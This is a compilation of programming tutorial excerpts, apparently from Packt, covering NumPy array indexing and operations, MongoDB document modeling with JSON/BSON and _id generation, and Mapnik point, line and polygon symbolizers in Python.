ar = np.array([0,1,2]) In [7]: ar[5]    ---------------------------------------------------------------------------    IndexError                 Traceback (most recent call last) <ipython-input-7-8ef7e0800b7a> in <module>()    ----> 1 ar[5]      IndexError: index 5 is out of bounds for axis 0 with size 3 Thus, for 2D arrays, the first dimension denotes rows and the second dimension, the columns. The colon (:) denotes selection across all elements of the dimension. Array slicing Arrays can be sliced using the following syntax: ar[startIndex: endIndex: stepValue]. In [82]: ar=2*np.arange(6); ar Out[82]: array([ 0, 2, 4, 6, 8, 10]) In [85]: ar[1:5:2] Out[85]: array([2, 6]) Note that if we wish to include the endIndex value, we need to go above it, as follows: In [86]: ar[1:6:2] Out[86]: array([ 2, 6, 10]) Obtain the first n-elements using ar[:n]: In [91]: ar[:4] Out[91]: array([0, 2, 4, 6]) The implicit assumption here is that startIndex=0, step=1. Start at element 4 until the end: In [92]: ar[4:] Out[92]: array([ 8, 10]) Slice array with stepValue=3: In [94]: ar[::3] Out[94]: array([0, 6]) To illustrate the scope of indexing in NumPy, let us refer to this illustration, which is taken from a NumPy lecture given at SciPy 2013 and can be found at http://bit.ly/1GxCDpC: Let us now examine the meanings of the expressions in the preceding image: The expression a[0,3:5] indicates the start at row 0, and columns 3-5, where column 5 is not included. In the expression a[4:,4:], the first 4 indicates the start at row 4 and will give all columns, that is, the array [[40, 41,42,43,44,45] [50,51,52,53,54,55]]. The second 4 shows the cutoff at the start of column 4 to produce the array [[44, 45], [54, 55]]. The expression a[:,2] gives all rows from column 2. Now, in the last expression a[2::2,::2], 2::2 indicates that the start is at row 2 and the step value here is also 2. This would give us the array [[20, 21, 22, 23, 24, 25], [40, 41, 42, 43, 44, 45]]. Further, ::2 specifies that we retrieve columns in steps of 2, producing the end result array ([[20, 22, 24], [40, 42, 44]]). 
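Since the illustration itself may not be reproduced here, the following short sketch rebuilds a comparable 6 x 6 array (entry (i, j) holding 10*i + j, which is what the figure assumes) so that each expression can be checked directly:

import numpy as np

# Rebuild the 6 x 6 array from the illustration: entry (i, j) is 10*i + j
a = 10 * np.arange(6)[:, np.newaxis] + np.arange(6)

print(a[0, 3:5])      # [3 4]
print(a[4:, 4:])      # [[44 45]
                      #  [54 55]]
print(a[:, 2])        # [ 2 12 22 32 42 52]
print(a[2::2, ::2])   # [[20 22 24]
                      #  [40 42 44]]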
Assignment and slicing can be combined as shown in the following code snippet: In [96]: ar Out[96]: array([ 0, 2, 4, 6, 8, 10]) In [100]: ar[:3]=1; ar Out[100]: array([ 1, 1, 1, 6, 8, 10]) In [110]: ar[2:]=np.ones(4);ar Out[110]: array([1, 1, 1, 1, 1, 1]) Array masking Here, NumPy arrays can be used as masks to select or filter out elements of the original array. For example, see the following snippet: In [146]: np.random.seed(10)          ar=np.random.random_integers(0,25,10); ar Out[146]: array([ 9, 4, 15, 0, 17, 25, 16, 17, 8, 9]) In [147]: evenMask=(ar % 2==0); evenMask Out[147]: array([False, True, False, True, False, False, True, False, True, False], dtype=bool) In [148]: evenNums=ar[evenMask]; evenNums Out[148]: array([ 4, 0, 16, 8]) In the following example, we randomly generate an array of 10 integers between 0 and 25. Then, we create a Boolean mask array that is used to filter out only the even numbers. This masking feature can be very useful, say for example, if we wished to eliminate missing values, by replacing them with a default value. Here, the missing value '' is replaced by 'USA' as the default country. Note that '' is also an empty string: In [149]: ar=np.array(['Hungary','Nigeria',                        'Guatemala','','Poland',                        '','Japan']); ar Out[149]: array(['Hungary', 'Nigeria', 'Guatemala',                  '', 'Poland', '', 'Japan'],                  dtype='|S9') In [150]: ar[ar=='']='USA'; ar Out[150]: array(['Hungary', 'Nigeria', 'Guatemala', 'USA', 'Poland', 'USA', 'Japan'], dtype='|S9') Arrays of integers can also be used to index an array to produce another array. Note that this produces multiple values; hence, the output must be an array of type ndarray. This is illustrated in the following snippet: In [173]: ar=11*np.arange(0,10); ar Out[173]: array([ 0, 11, 22, 33, 44, 55, 66, 77, 88, 99]) In [174]: ar[[1,3,4,2,7]] Out[174]: array([11, 33, 44, 22, 77]) In the preceding code, the selection object is a list and elements at indices 1, 3, 4, 2, and 7 are selected. Now, assume that we change it to the following: In [175]: ar[1,3,4,2,7] We get an IndexError error since the array is 1D and we're specifying too many indices to access it. IndexError         Traceback (most recent call last) <ipython-input-175-adbcbe3b3cdc> in <module>() ----> 1 ar[1,3,4,2,7]   IndexError: too many indices This assignment is also possible with array indexing, as follows: In [176]: ar[[1,3]]=50; ar Out[176]: array([ 0, 50, 22, 50, 44, 55, 66, 77, 88, 99]) When a new array is created from another array by using a list of array indices, the new array has the same shape. Complex indexing Here, we illustrate the use of complex indexing to assign values from a smaller array into a larger one: In [188]: ar=np.arange(15); ar Out[188]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])   In [193]: ar2=np.arange(0,-10,-1)[::-1]; ar2 Out[193]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0]) Slice out the first 10 elements of ar, and replace them with elements from ar2, as follows: In [194]: ar[:10]=ar2; ar Out[194]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 10, 11, 12, 13, 14]) Copies and views A view on a NumPy array is just a particular way of portraying the data it contains. Creating a view does not result in a new copy of the array, rather the data it contains may be arranged in a specific order, or only certain data rows may be shown. 
Thus, if data is replaced on the underlying array's data, this will be reflected in the view whenever the data is accessed via indexing. The initial array is not copied into the memory during slicing and is thus more efficient. The np.may_share_memory method can be used to see if two arrays share the same memory block. However, it should be used with caution as it may produce false positives. Modifying a view modifies the original array: In [118]:ar1=np.arange(12); ar1 Out[118]:array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])   In [119]:ar2=ar1[::2]; ar2 Out[119]: array([ 0, 2, 4, 6, 8, 10])   In [120]: ar2[1]=-1; ar1 Out[120]: array([ 0, 1, -1, 3, 4, 5, 6, 7, 8, 9, 10, 11]) To force NumPy to copy an array, we use the np.copy function. As we can see in the following array, the original array remains unaffected when the copied array is modified: In [124]: ar=np.arange(8);ar Out[124]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [126]: arc=ar[:3].copy(); arc Out[126]: array([0, 1, 2])   In [127]: arc[0]=-1; arc Out[127]: array([-1, 1, 2])   In [128]: ar Out[128]: array([0, 1, 2, 3, 4, 5, 6, 7]) Operations Here, we present various operations in NumPy. Basic operations Basic arithmetic operations work element-wise with scalar operands. They are - +, -, *, /, and **. In [196]: ar=np.arange(0,7)*5; ar Out[196]: array([ 0, 5, 10, 15, 20, 25, 30])   In [198]: ar=np.arange(5) ** 4 ; ar Out[198]: array([ 0,   1, 16, 81, 256])   In [199]: ar ** 0.5 Out[199]: array([ 0.,   1.,   4.,   9., 16.]) Operations also work element-wise when another array is the second operand as follows: In [209]: ar=3+np.arange(0, 30,3); ar Out[209]: array([ 3, 6, 9, 12, 15, 18, 21, 24, 27, 30])   In [210]: ar2=np.arange(1,11); ar2 Out[210]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) Here, in the following snippet, we see element-wise subtraction, division, and multiplication: In [211]: ar-ar2 Out[211]: array([ 2, 4, 6, 8, 10, 12, 14, 16, 18, 20])   In [212]: ar/ar2 Out[212]: array([3, 3, 3, 3, 3, 3, 3, 3, 3, 3])   In [213]: ar*ar2 Out[213]: array([ 3, 12, 27, 48, 75, 108, 147, 192, 243, 300]) It is much faster to do this using NumPy rather than pure Python. The %timeit function in IPython is known as a magic function and uses the Python timeit module to time the execution of a Python statement or expression, explained as follows: In [214]: ar=np.arange(1000)          %timeit a**3          100000 loops, best of 3: 5.4 µs per loop   In [215]:ar=range(1000)          %timeit [ar[i]**3 for i in ar]          1000 loops, best of 3: 199 µs per loop Array multiplication is not the same as matrix multiplication; it is element-wise, meaning that the corresponding elements are multiplied together. For matrix multiplication, use the dot operator. For more information refer to http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html. 
In [228]: ar=np.array([[1,1],[1,1]]); ar Out[228]: array([[1, 1],                  [1, 1]])   In [230]: ar2=np.array([[2,2],[2,2]]); ar2 Out[230]: array([[2, 2],                  [2, 2]])   In [232]: ar.dot(ar2) Out[232]: array([[4, 4],                  [4, 4]]) Comparisons and logical operations are also element-wise: In [235]: ar=np.arange(1,5); ar Out[235]: array([1, 2, 3, 4])   In [238]: ar2=np.arange(5,1,-1);ar2 Out[238]: array([5, 4, 3, 2])   In [241]: ar < ar2 Out[241]: array([ True, True, False, False], dtype=bool)   In [242]: l1 = np.array([True,False,True,False])          l2 = np.array([False,False,True, False])          np.logical_and(l1,l2) Out[242]: array([False, False, True, False], dtype=bool) Other NumPy operations such as log, sin, cos, and exp are also element-wise: In [244]: ar=np.array([np.pi, np.pi/2]); np.sin(ar) Out[244]: array([ 1.22464680e-16,   1.00000000e+00]) Note that for element-wise operations on two NumPy arrays, the two arrays must have the same shape, else an error will result since the arguments of the operation must be the corresponding elements in the two arrays: In [245]: ar=np.arange(0,6); ar Out[245]: array([0, 1, 2, 3, 4, 5])   In [246]: ar2=np.arange(0,8); ar2 Out[246]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [247]: ar*ar2          ---------------------------------------------------------------------------          ValueError                              Traceback (most recent call last)          <ipython-input-247-2c3240f67b63> in <module>()          ----> 1 ar*ar2          ValueError: operands could not be broadcast together with shapes (6) (8) Further, NumPy arrays can be transposed as follows: In [249]: ar=np.array([[1,2,3],[4,5,6]]); ar Out[249]: array([[1, 2, 3],                  [4, 5, 6]])   In [250]:ar.T Out[250]:array([[1, 4],                [2, 5],                [3, 6]])   In [251]: np.transpose(ar) Out[251]: array([[1, 4],                 [2, 5],                  [3, 6]]) Suppose we wish to compare arrays not element-wise, but array-wise. We could achieve this as follows by using the np.array_equal operator: In [254]: ar=np.arange(0,6)          ar2=np.array([0,1,2,3,4,5])          np.array_equal(ar, ar2) Out[254]: True Here, we see that a single Boolean value is returned instead of a Boolean array. The value is True only if all the corresponding elements in the two arrays match. The preceding expression is equivalent to the following: In [24]: np.all(ar==ar2) Out[24]: True Reduction operations Operators such as np.sum and np.prod perform reduces on arrays; that is, they combine several elements into a single value: In [257]: ar=np.arange(1,5)          ar.prod() Out[257]: 24 In the case of multi-dimensional arrays, we can specify whether we want the reduction operator to be applied row-wise or column-wise by using the axis parameter: In [259]: ar=np.array([np.arange(1,6),np.arange(1,6)]);ar Out[259]: array([[1, 2, 3, 4, 5],                 [1, 2, 3, 4, 5]]) # Columns In [261]: np.prod(ar,axis=0) Out[261]: array([ 1, 4, 9, 16, 25]) # Rows In [262]: np.prod(ar,axis=1) Out[262]: array([120, 120]) In the case of multi-dimensional arrays, not specifying an axis results in the operation being applied to all elements of the array as explained in the following example: In [268]: ar=np.array([[2,3,4],[5,6,7],[8,9,10]]); ar.sum() Out[268]: 54   In [269]: ar.mean() Out[269]: 6.0 In [271]: np.median(ar) Out[271]: 6.0 Statistical operators These operators are used to apply standard statistical operations to a NumPy array. 
The names are self-explanatory: np.std(), np.mean(), np.median(), and np.cumsum(). In [309]: np.random.seed(10)          ar=np.random.randint(0,10, size=(4,5));ar Out[309]: array([[9, 4, 0, 1, 9],                  [0, 1, 8, 9, 0],                  [8, 6, 4, 3, 0],                  [4, 6, 8, 1, 8]]) In [310]: ar.mean() Out[310]: 4.4500000000000002   In [311]: ar.std() Out[311]: 3.4274626183227732   In [312]: ar.var(axis=0) # across rows Out[312]: array([ 12.6875,   4.1875, 11.   , 10.75 , 18.1875])   In [313]: ar.cumsum() Out[313]: array([ 9, 13, 13, 14, 23, 23, 24, 32, 41, 41, 49, 55,                  59, 62, 62, 66, 72, 80, 81, 89]) Logical operators Logical operators can be used for array comparison/checking. They are as follows: np.all(): This is used for element-wise and all of the elements np.any(): This is used for element-wise or all of the elements Generate a random 4 × 4 array of ints and check if any element is divisible by 7 and if all elements are less than 11: In [320]: np.random.seed(100)          ar=np.random.randint(1,10, size=(4,4));ar Out[320]: array([[9, 9, 4, 8],                  [8, 1, 5, 3],                  [6, 3, 3, 3],                  [2, 1, 9, 5]])   In [318]: np.any((ar%7)==0) Out[318]: False   In [319]: np.all(ar<11) Out[319]: True Broadcasting In broadcasting, we make use of NumPy's ability to combine arrays that don't have the same exact shape. Here is an example: In [357]: ar=np.ones([3,2]); ar Out[357]: array([[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]])   In [358]: ar2=np.array([2,3]); ar2 Out[358]: array([2, 3])   In [359]: ar+ar2 Out[359]: array([[ 3., 4.],                  [ 3., 4.],                  [ 3., 4.]]) Thus, we can see that ar2 is broadcasted across the rows of ar by adding it to each row of ar producing the preceding result. Here is another example, showing that broadcasting works across dimensions: In [369]: ar=np.array([[23,24,25]]); ar Out[369]: array([[23, 24, 25]]) In [368]: ar.T Out[368]: array([[23],                  [24],                  [25]]) In [370]: ar.T+ar Out[370]: array([[46, 47, 48],                  [47, 48, 49],                  [48, 49, 50]]) Here, both row and column arrays were broadcasted and we ended up with a 3 × 3 array. Array shape manipulation There are a number of steps for the shape manipulation of arrays. Flattening a multi-dimensional array The np.ravel() function allows you to flatten a multi-dimensional array as follows: In [385]: ar=np.array([np.arange(1,6), np.arange(10,15)]); ar Out[385]: array([[ 1, 2, 3, 4, 5],                  [10, 11, 12, 13, 14]])   In [386]: ar.ravel() Out[386]: array([ 1, 2, 3, 4, 5, 10, 11, 12, 13, 14])   In [387]: ar.T.ravel() Out[387]: array([ 1, 10, 2, 11, 3, 12, 4, 13, 5, 14]) You can also use np.flatten, which does the same thing, except that it returns a copy while np.ravel returns a view. Reshaping The reshape function can be used to change the shape of or unflatten an array: In [389]: ar=np.arange(1,16);ar Out[389]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) In [390]: ar.reshape(3,5) Out[390]: array([[ 1, 2, 3, 4, 5],                  [ 6, 7, 8, 9, 10],                 [11, 12, 13, 14, 15]]) The np.reshape function returns a view of the data, meaning that the underlying array remains unchanged. In special cases, however, the shape cannot be changed without the data being copied. For more details on this, see the documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html. 
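To make the view behaviour concrete, here is a brief check that is not from the original text (the values are arbitrary): whenever reshape can avoid a copy, writing through the reshaped result is visible in the original array.

import numpy as np

ar = np.arange(6)
reshaped = ar.reshape(2, 3)     # normally a view onto the same buffer
reshaped[0, 0] = 99

print(ar)                       # [99  1  2  3  4  5]
print(reshaped.base is ar)      # True when no copy was needed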
Resizing There are two resize operators, numpy.ndarray.resize, which is an ndarray operator that resizes in place, and numpy.resize, which returns a new array with the specified shape. Here, we illustrate the numpy.ndarray.resize function: In [408]: ar=np.arange(5); ar.resize((8,));ar Out[408]: array([0, 1, 2, 3, 4, 0, 0, 0]) Note that this function only works if there are no other references to this array; else, ValueError results: In [34]: ar=np.arange(5);          ar Out[34]: array([0, 1, 2, 3, 4]) In [35]: ar2=ar In [36]: ar.resize((8,)); --------------------------------------------------------------------------- ValueError                                Traceback (most recent call last) <ipython-input-36-394f7795e2d1> in <module>() ----> 1 ar.resize((8,));   ValueError: cannot resize an array that references or is referenced by another array in this way. Use the resize function The way around this is to use the numpy.resize function instead: In [38]: np.resize(ar,(8,)) Out[38]: array([0, 1, 2, 3, 4, 0, 1, 2]) Adding a dimension The np.newaxis function adds an additional dimension to an array: In [377]: ar=np.array([14,15,16]); ar.shape Out[377]: (3,) In [378]: ar Out[378]: array([14, 15, 16]) In [379]: ar=ar[:, np.newaxis]; ar.shape Out[379]: (3, 1) In [380]: ar Out[380]: array([[14],                  [15],                  [16]]) Array sorting Arrays can be sorted in various ways. Sort the array along an axis; first, let's discuss this along the y-axis: In [43]: ar=np.array([[3,2],[10,-1]])          ar Out[43]: array([[ 3, 2],                [10, -1]]) In [44]: ar.sort(axis=1)          ar Out[44]: array([[ 2, 3],                [-1, 10]]) Here, we will explain the sorting along the x-axis: In [45]: ar=np.array([[3,2],[10,-1]])          ar Out[45]: array([[ 3, 2],                [10, -1]]) In [46]: ar.sort(axis=0)          ar Out[46]: array([[ 3, -1],                [10, 2]]) Sorting by in-place (np.array.sort) and out-of-place (np.sort) functions. Other operations that are available for array sorting include the following: np.min(): It returns the minimum element in the array np.max(): It returns the maximum element in the array np.std(): It returns the standard deviation of the elements in the array np.var(): It returns the variance of elements in the array np.argmin(): It indices of minimum np.argmax(): It indices of maximum np.all(): It returns element-wise and all of the elements np.any(): It returns element-wise or all of the elements Summary In this article we discussed how numpy.ndarray is the bedrock data structure on which the pandas data structures are based. The pandas data structures at their heart consist of NumPy ndarray of data and an array or arrays of labels. There are three main data structures in pandas: Series, DataFrame, and Panel. The pandas data structures are much easier to use and more user-friendly than Numpy ndarrays, since they provide row indexes and column indexes in the case of DataFrame and Panel. The DataFrame object is the most popular and widely used object in pandas. Resources for Article: Further resources on this subject: Machine Learning [article] Financial Derivative – Options [article] Introducing Interactive Plotting [article]

Documents and Collections in Data Modeling with MongoDB

Packt
22 Jun 2015
12 min read
In this article by Wilson da Rocha França, author of the book, MongoDB Data Modeling, we will cover documents and collections used in data modeling with MongoDB.

Data modeling is a very important process during the conception of an application, since this step will help you to define the necessary requirements for the database's construction. This definition is precisely the result of the data understanding acquired during the data modeling process. As previously described, this process, regardless of the chosen data model, is commonly divided into two phases: one that is very close to the user's view and the other that is a translation of this view to a conceptual schema. In the scenario of relational database modeling, the main challenge is to build a robust database from these two phases, with the aim of guaranteeing that updates to it can be made with little or no impact during the application's lifecycle.

A big advantage of NoSQL compared to relational databases is that NoSQL databases are more flexible at this point, due to the possibility of a schema-less model that, in theory, causes less impact on the user's view if a modification in the data model is needed. Despite the flexibility NoSQL offers, it is important to know beforehand how we will use the data in order to model a NoSQL database; it is still a good idea to plan the format of the data to be persisted, even in a NoSQL database. Moreover, at first sight, this is the point where database administrators, quite used to the relational world, become more uncomfortable.

Relational database standards, such as SQL, brought us a sense of security and stability by setting up rules, norms, and criteria. On the other hand, we dare to state that this security kept database designers distant from the domain from which the data to be stored is drawn. The same thing happened with application developers. There is a notable divergence of interests between them and database administrators, especially regarding data models. NoSQL databases practically demand a closer relationship between database professionals and the applications, and between developers and the databases. For that reason, even though you may be a data modeler/designer or a database administrator, don't be scared if from now on we address subjects that are out of your comfort zone. Be prepared to start using words that are common from the application developer's point of view, and add them to your vocabulary.

This article will cover the following:

Introducing your documents and collections
The document's characteristics and structure

Introducing documents and collections
MongoDB has the document as its basic unit of data. The documents in MongoDB are represented in JavaScript Object Notation (JSON). Collections are groups of documents. Making an analogy, a collection is similar to a table in a relational model, and a document is similar to a record in such a table. Finally, collections belong to a database in MongoDB. The documents are serialized on disk in a format known as Binary JSON (BSON), a binary representation of a JSON document. An example of a document is:

{
   "_id": 123456,
   "firstName": "John",
   "lastName": "Clay",
   "age": 25,
   "address": {
     "streetAddress": "131 GEN. Almério de Moura Street",
     "city": "Rio de Janeiro",
     "state": "RJ",
     "postalCode": "20921060"
   },
   "phoneNumber":[
     {
         "type": "home",
         "number": "+5521 2222-3333"
     },
     {
         "type": "mobile",
         "number": "+5521 9888-7777"
     }
   ]
}
Unlike the relational model, where you must declare a table structure, a collection doesn't enforce a certain structure for a document. It is possible that a collection contains documents with completely different structures. We can have, for instance, on the same users collection:

{
   "_id": "123456",
   "username": "johnclay",
   "age": 25,
   "friends":[
     {"username": "joelsant"},
     {"username": "adilsonbat"}
   ],
   "active": true,
   "gender": "male"
}

We can also have:

{
   "_id": "654321",
   "username": "santymonty",
   "age": 25,
   "active": true,
   "gender": "male",
   "eyeColor": "brown"
}

In addition to this, another interesting feature of MongoDB is that not just data is represented by documents. Basically, all user interactions with MongoDB are made through documents. Besides data recording, documents are a means to:

Define what data can be read, written, and/or updated in queries
Define which fields will be updated
Create indexes
Configure replication
Query the information from the database

Before we go deep into the technical details of documents, let's explore their structure.

JSON
JSON is a text format for the open-standard representation of data that is ideal for data traffic. To explore the JSON format deeper, you can check ECMA-404, The JSON Data Interchange Standard, where the JSON format is fully described.

JSON is described by two standards: ECMA-404 and RFC 7159. The first one puts more focus on the JSON grammar and syntax, while the second provides semantic and security considerations.

As the name suggests, JSON arises from the JavaScript language. It came about as a solution for transferring object state between the web server and the browser. Despite being part of JavaScript, it is possible to find generators and readers for JSON in almost all of the most popular programming languages, such as C, Java, and Python. The JSON format is also considered highly friendly and human-readable. JSON does not depend on the platform chosen, and its specification is based on two data structures:

A set or group of key/value pairs
An ordered list of values

So, in order to clarify any doubts, let's talk about objects. Objects are a non-ordered collection of key/value pairs that are represented by the following pattern:

{
   "key" : "value"
}

An ordered list of values is represented as an array, as follows:

["value1", "value2", "value3"]

In the JSON specification, a value can be:

A string delimited with " "
A number, with or without a sign, on a decimal base (base 10). This number can have a fractional part, delimited by a period (.), or an exponential part followed by e or E
Boolean values (true or false)
A null value
Another object
Another ordered array of values

The following diagram shows us the JSON value structure:

Here is an example of JSON code that describes a person:

{
   "name" : "Han",
   "lastname" : "Solo",
   "position" : "Captain of the Millenium Falcon",
   "species" : "human",
   "gender":"male",
   "height" : 1.8
}

BSON
BSON means Binary JSON, which, in other words, means binary-encoded serialization for JSON documents. If you are seeking more knowledge on BSON, I suggest you take a look at the BSON specification at http://bsonspec.org/.
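If you want to see what this serialization looks like from Python, the bson package that ships with recent versions of the PyMongo driver can round-trip a document. This is just an illustrative sketch and is not part of the article, which works in the mongo shell:

# Requires the bson package bundled with a recent PyMongo (pip install pymongo).
# This only illustrates a JSON-like document being serialized to BSON.
import bson

doc = {"name": "Han", "lastname": "Solo", "height": 1.8}

data = bson.encode(doc)      # bytes: the BSON serialization of the document
print(len(data))             # BSON is a length-prefixed binary format
print(bson.decode(data))     # back to a Python dict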
If we compare BSON to other binary formats, BSON has the advantage of being a model that allows you more flexibility. Also, one of its characteristics is that it is lightweight, a feature that is very important for data transport on the Web. The BSON format was designed to be easily navigable, and to be encoded and decoded very efficiently by most programming languages that are based on C. This is the reason why BSON was chosen as the data format for MongoDB disk persistence.

The types of data representation in BSON are:

String UTF-8 (string)
Integer 32-bit (int32)
Integer 64-bit (int64)
Floating point (double)
Document (document)
Array (document)
Binary data (binary)
Boolean false (x00 or byte 0000 0000)
Boolean true (x01 or byte 0000 0001)
UTC datetime (int64): the int64 is UTC milliseconds since the Unix epoch
Timestamp (int64): this is the special internal type used by MongoDB replication and sharding; the first 4 bytes are an increment, and the last 4 are a timestamp
Null value ()
Regular expression (cstring)
JavaScript code (string)
JavaScript code w/scope (code_w_s)
Min key(): the special type that compares lower than all other possible BSON element values
Max key(): the special type that compares higher than all other possible BSON element values
ObjectId (byte*12)

Characteristics of documents
Before we go into detail about how we must model documents, we need a better understanding of some of their characteristics. These characteristics can determine your decision about how the document must be modeled.

The document size
We must keep in mind that the maximum length for a BSON document is 16 MB. According to the BSON specification, this length is ideal for data transfer through the Web and for avoiding excessive use of RAM. But this is only a recommendation. Nowadays, a document can exceed the 16 MB length by using GridFS. GridFS allows us to store documents in MongoDB that are larger than the BSON maximum size, by dividing them into parts, or chunks. Each chunk is a new document with a size of 255 KB.

Names and values for a field in a document
There are a few things that you must know about names and values for fields in a document. First of all, any field's name in a document is a string. As usual, we have some restrictions on field names. They are:

The _id field is reserved for a primary key
You cannot start the name using the character $
The name cannot contain a null character or a period (.)

Additionally, documents that have indexed fields must respect the size limit for an indexed field: the indexed values cannot exceed a maximum size of 1,024 bytes.

The document primary key
As seen in the preceding section, the _id field is reserved for the primary key. By default, this field must be the first one in the document; even when, during an insertion, it is not the first field to be inserted, MongoDB moves it to the first position. Also, by definition, it is on this field that a unique index will be created.

The _id field can have any value that is a BSON type, except the array. Moreover, if a document is created without an _id field, MongoDB will automatically create an _id field of the ObjectId type. However, this is not the only option. You can use any value you want to identify your document, as long as it is unique. There is another option, that is, generating an auto-incremented value based on a support collection or on an optimistic loop.
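Before looking at those alternatives, here is a small sketch of the default ObjectId behavior using the PyMongo driver; the connection URI, database name, and field values are assumptions chosen for illustration only:

# Minimal sketch using PyMongo (pip install pymongo); assumes a local mongod
# on the default port and a throwaway database called "test".
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017/")
users = client.test.users

# No _id supplied, so MongoDB generates an ObjectId for us.
result = users.insert_one({"username": "johnclay", "age": 25})
print(result.inserted_id)    # an automatically generated ObjectId

# Supplying our own unique _id is also allowed.
users.insert_one({"_id": "johnclay", "age": 25})

Running the last insert twice raises a duplicate key error, which is exactly the uniqueness guarantee of the _id index described above.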
Support collections
In this method, we use a separate collection that will keep the last used value in the sequence. To increment the sequence, first we should query the last used value. After this, we can use the operator $inc to increment the value.

There is a collection called system.js that can keep JavaScript code in order to reuse it. Be careful not to include application logic in this collection. Let's see an example for this method:

db.counters.insert(
   {
     _id: "userid",
     seq: 0
   }
)

function getNextSequence(name) {
   var ret = db.counters.findAndModify(
         {
           query: { _id: name },
           update: { $inc: { seq: 1 } },
           new: true
         }
   );
   return ret.seq;
}

db.users.insert(
   {
     _id: getNextSequence("userid"),
     name: "Sarah C."
   }
)

The optimistic loop
The generation of the _id field by an optimistic loop is done by incrementing the sequence value on each iteration and, after that, attempting to use it as the _id of a new document:

function insertDocument(doc, targetCollection) {
   while (1) {
       var cursor = targetCollection.find( {},
        { _id: 1 } ).sort( { _id: -1 } ).limit(1);
       var seq = cursor.hasNext() ? cursor.next()._id + 1 : 1;
       doc._id = seq;
       var results = targetCollection.insert(doc);
       if( results.hasWriteError() ) {
           if( results.writeError.code == 11000 /* dup key */ )
               continue;
           else
               print( "unexpected error inserting data: " +
                tojson( results ) );
       }
       break;
   }
}

In this function, each iteration does the following:

Searches targetCollection for the maximum value of _id.
Determines the next value for _id.
Sets the value on the document to be inserted.
Inserts the document.

In the case of errors due to duplicated _id fields, the loop repeats itself; otherwise, the iteration ends. The points demonstrated here are the basics for understanding all the possibilities and approaches that this tool can offer. However, although we can use auto-incrementing fields in MongoDB, we should avoid them because this approach does not scale well for large volumes of data.

Summary
In this article, you saw how to build documents in MongoDB, examined their characteristics, and saw how they are organized into collections.

Resources for Article:
Further resources on this subject:
Apache Solr and Big Data – integration with MongoDB [article]
About MongoDB [article]
Creating a RESTful API [article]


Symbolizers

Packt
18 Jun 2015
8 min read
In this article by Erik Westra, author of the book, Python Geospatial Analysis Essentials, we will see that symbolizers do the actual work of drawing a feature onto the map. Multiple symbolizers are often used to draw a single feature. There are many different types of symbolizers available within Mapnik, and many of the symbolizers have complex options associated with them. Rather than exhaustively listing all the symbolizers and their various options, we will instead just look at some of the more common types of symbolizers and how they can be used.

PointSymbolizer
The PointSymbolizer class is used to draw an image centered over a Point geometry. By default, each point is displayed as a 4 x 4 pixel black square. To use a different image, you have to create a mapnik.PathExpression object to represent the path to the desired image file, and then pass that to the PointSymbolizer object when you instantiate it:

path = mapnik.PathExpression("/path/to/image.png")
point_symbol = mapnik.PointSymbolizer(path)

Note that PointSymbolizer draws the image centered on the desired point. To use a drop-pin image as shown in the preceding example, you will need to add extra transparent whitespace so that the tip of the pin is in the middle of the image.

You can control the opacity of the drawn image by setting the symbolizer's opacity attribute. You can also control whether labels will be drawn on top of the image by setting the allow_overlap attribute to True. Finally, you can apply an SVG transformation to the image by setting the transform attribute to a string containing a standard SVG transformation expression, for example, point_symbol.transform = "rotate(45)".

Documentation for the PointSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/PointSymbolizer.

LineSymbolizer
A mapnik.LineSymbolizer is used to draw LineString geometries and the outlines of Polygon geometries. When you create a new LineSymbolizer, you would typically configure it using two parameters: the color to use to draw the line, as a mapnik.Color object, and the width of the line, measured in pixels. For example:

line_symbol = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5)

Notice that you can use fractional line widths; because Mapnik uses anti-aliasing, a line narrower than 1 pixel will often look better than a line with an integer width if you are drawing many lines close together.

In addition to the color and the width, you can also make the line semi-transparent by setting the opacity attribute. This should be set to a number between 0.0 and 1.0, where 0.0 means the line will be completely transparent and 1.0 means the line will be completely opaque.

You can also use the stroke attribute to get access to (or replace) the stroke object used by the line symbolizer. The stroke object, an instance of mapnik.Stroke, can be used for more complicated visual effects. For example, you can create a dashed line effect by calling the stroke's add_dash() method:

line_symbol.stroke.add_dash(5, 7)

Both numbers are measured in pixels; the first number is the length of the dash segment, while the second is the length of the gap between dashes. Note that you can create alternating dash patterns by calling add_dash() more than once.
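As a quick illustration of the stroke options described so far, the following sketch (not from the book) builds a thin line symbolizer with an alternating dash pattern; the color, width, and dash lengths are arbitrary values chosen for the example:

import mapnik

# A thin line with an alternating dash pattern; values are illustrative only.
line_symbol = mapnik.LineSymbolizer(mapnik.Color("steelblue"), 1.5)
line_symbol.stroke.add_dash(8, 4)   # 8-pixel dash followed by a 4-pixel gap
line_symbol.stroke.add_dash(2, 4)   # a second call alternates in a shorter dash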
You can also set the stroke's line_cap attribute to control how the ends of the line should be drawn, and the stroke's line_join attribute to control how the joins between the individual line segments are drawn whenever the LineString changes direction. The line_cap attribute can be set to one of the following values:

mapnik.line_cap.BUTT_CAP
mapnik.line_cap.ROUND_CAP
mapnik.line_cap.SQUARE_CAP

The line_join attribute can be set to one of the following:

mapnik.line_join.MITER_JOIN
mapnik.line_join.ROUND_JOIN
mapnik.line_join.BEVEL_JOIN

Documentation for the LineSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/LineSymbolizer.

PolygonSymbolizer
The mapnik.PolygonSymbolizer class is used to fill the interior of a Polygon geometry with a given color. When you create a new PolygonSymbolizer, you would typically pass it a single parameter: the mapnik.Color object to use to fill the polygon. You can also change the opacity of the symbolizer by setting the fill_opacity attribute, for example:

fill_symbol.fill_opacity = 0.8

Once again, the opacity is measured from 0.0 (completely transparent) to 1.0 (completely opaque).

